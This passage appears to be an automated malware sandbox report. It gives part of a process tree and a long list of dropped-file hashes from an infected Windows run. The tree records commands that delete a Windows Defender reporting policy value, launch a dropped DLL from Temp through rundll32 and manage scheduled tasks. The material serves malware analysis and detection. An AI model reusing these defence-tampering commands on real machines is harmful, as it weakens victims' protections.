PID:2680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jFAecgscnrJhBwrRF"3⤵PID:928
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2676
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2920
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:2532
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GVFFxSkoOBQmaesjx"3⤵PID:3052
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tZRuTBnWsrIvjiMS\nMnJSQRH\UlJVOFD.dll",#1 /VKsite_idBSU 5254032⤵PID:1988
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tZRuTBnWsrIvjiMS\nMnJSQRH\UlJVOFD.dll",#1 /VKsite_idBSU 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2012 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jFAecgscnrJhBwrRF"4⤵PID:2660
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1544
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2496
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:548
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
2KB
MD5 e4ac974612956d6059225dd3d6b585e4
SHA1 cc1dd0d21f8b3d50fbf73c7332bb1bdea87c9631
SHA256 621d43e195fdbe0f83a3dc997ebdafd011a3d6532985f13d623e91351563ba33
SHA512 73c720e4e27b5e376dc3ad2c6ae5e17866dbad4071e273bcc0e284e06f297d4ee2d61c3b44c9c3751ad672add9f7ffe29e83bff6b43e09fb4b60fc40c99288f6
-
Filesize
2KB
MD56246cc28c87c69866338e855e3839a5e
SHA136f335e64ef26809595455fcf5153873ecb70d1c
SHA256ccce0caeb5a49e4a16dce01ffb07c9b6ce77517a47cce64e9eda2ebebbc5180c
SHA5122de49474c39edeb3feeaed5d083ff70133f5489ed03fc1307ed404e0ff70662d74e955e04c420b4a4daece05589e61f24ef31aedea6a88fe99d92e12e8d5f684
-
Filesize
2KB
MD582f524ddd62c7bff831f25131d29c308
SHA1434319026ae107e114bc862a7cc158254a00211d
SHA2560541667b0e9c9101d69e4cea0b57cd1774e02192d46d834eccc8a21378f3e632
SHA5129a55c5be6e211988742a65ecdfcd705f87c254f1bc388e7dea5e37ad3c8e02b6a1d46c0ca2daea1009f3cb311d5351abc75158ec441a104765caa72c4def6e5c
-
Filesize
2KB
MD5a37a8394d00066b87d81a9423e341351
SHA1da3266c93a6c4203c5cfca5711954a0a295d581a
SHA25685d08c05cb2ae51921a70ff6757d926ea2273d0777b58304cdc5e028f79c04b8
SHA512ee68107fcdeaf218ae5c5498fe8d551ae90ef72dd98eb7881ac7fc8359789df85fdd0469086b7dda0243c2fa365bb87080a1e3185b44cd24f152afbc29dfcae1
-
Filesize
1.2MB
MD58f7526ff0361a6faec57589bed39b08d
SHA1e3a50b89ff55562f171c6de99e66e47108093bb3
SHA2565bdb0ecbcd7ffd70f1b0794feb49f284613dcfcf873cdaf12f6c7ea8d5ec7518
SHA512168c2e0f11d56e9b77fbf8764e2dc96d1c33335063b4f43965dc644e66494c187f3c988366f4c6d4dc531bc8056c70e02f2b1f635252c38e5b82c5c65148b529
-
Filesize
2KB
MD514dc2e1f51ff7484657785d0bf1013a4
SHA156da370ee86a22af1bfa26825bef9e93a17de8fd
SHA25693a36e0b775b58a8ca049649c0904bc2910b77c3115539f1bfce0fc9511bce62
SHA5123b134d1cf746c1423f3e945872764b434c4f1e6e94c8021a36788112ff6eea11f96eb6d4536035f2175e44c8dd99ac221cf2aa3fa1e4be1ca3c4cafe03a8065e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize 187B
MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize 136B
MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize 150B
MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD5e36e5b216a99a1fbd74bcfae371202cf
SHA1a1937bad86b6e3da467410b45a6aa8c431a04a3b
SHA2564e115b6f3c6b0de572221cb74a563e8af453240b009d48c92b4bbae8da4ac966
SHA512ac2650db849915451f4b407be5121bfe8ed4764b74cd7beb4dbe03a8ea30219ef36cf16a388121738459ffd1d1949408ad3bf77401b880f1a62a698d13b16b11
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 baaf31747e7460e33021610cb8927eea
SHA1 a90b45129e69a830b118d599c7d1f6bfaf37e72e
SHA256 8b8230e633ab5073bb9729edcaa584addfdb7c05f3021dc8bbee29d9011956f7
SHA512 6cd04632649451ba6acd0a2466c88f0b216559ab31cc488a9317f18718f5d323f0bd5c4b073a066434698fa6289466fa3f47e88f71d01f31faa90fd1aad624fc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 b70e93c6c7112baec107b41a503e927f
SHA1 5d949a93575d4645c9ee4a8b198c95a244a286b4
SHA256 7226c76efc7031b0e38e611653a8d9b7015ca262f93d2aeedf32f6bd45eb6b2f
SHA512 6ddeb0367a94ca43121de74ba8e836c4102176c6c69a6288df1b93808ec3e745942ca16b9de025a60d1817fd35378d6429062ef23d71f8b7c44ef6915c8ed07f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 f0b9e129c8ff8ce5ec68a8e8e1e790c1
SHA1 cf1d83e2f02d18564af40490215f94c4dcafc24a
SHA256 70935ab0841a24dfa3e96de45c7f1f52600529f4ad976249467f8079620490c8
SHA512 89e9f3b30445861d8e246341d468dc20a0fea97b8b4f111373db0442cf90bbcea5bfef3ff8889671325ed796b17745177fdedb3dcb80458261e7ef7e63af832e
-
Filesize
7KB
MD5a0193bc2d236696558f5b00a22fc4faa
SHA13e86f76cbd953d3189d452e1ae1b8db9a0adcac7
SHA256666e3f71bf5cd9c167c36c6903f6dd8602a9bf251f4b69eff48799c97de47c6a
SHA5129e2d3da3155f408f4a83729ca2c91e9b0afa6068740e9a88fabda778567997758b8d1ff122af6c42dd4a5a7e50805283dff4636c082ac2f251d689b9aabe8611
-
Filesize
9KB
MD56c805470ab4014ac1394001e581b5b60
SHA1a8e127326bfd1bb1292e4785da56ba0c4b1e759c
SHA256c5cb0504bb5406bcc397211db7e2414809f03a6b220515f8af8e80e7a6995d82
SHA51261e83a2b19ccdf89ffd77b20eb109f09de4b5e24c32ef6153724ef938d27be6bfa0262b00d68eda08f3924bc9281c45959b840e53143443ebdbaecf4d34c66bb
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
5KB
MD5bbe7828cb907b8e58c9880955e58c568
SHA1c7725f70c03b04abedbb0e4fc1f0d4a8c10c0ef5
SHA25669ea559287281afd21a44f2fa4368e72f6fbfe3af309a92aae014992a9226f6d
SHA5120e9e1d2cff0bf9d15c39d93556ad9a0749a6e922442fb0325c999ef73e4af10df045363d9e44706e17172ef0965ad6b95e64eb4f7d176e17a286ec91a7fbe079
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2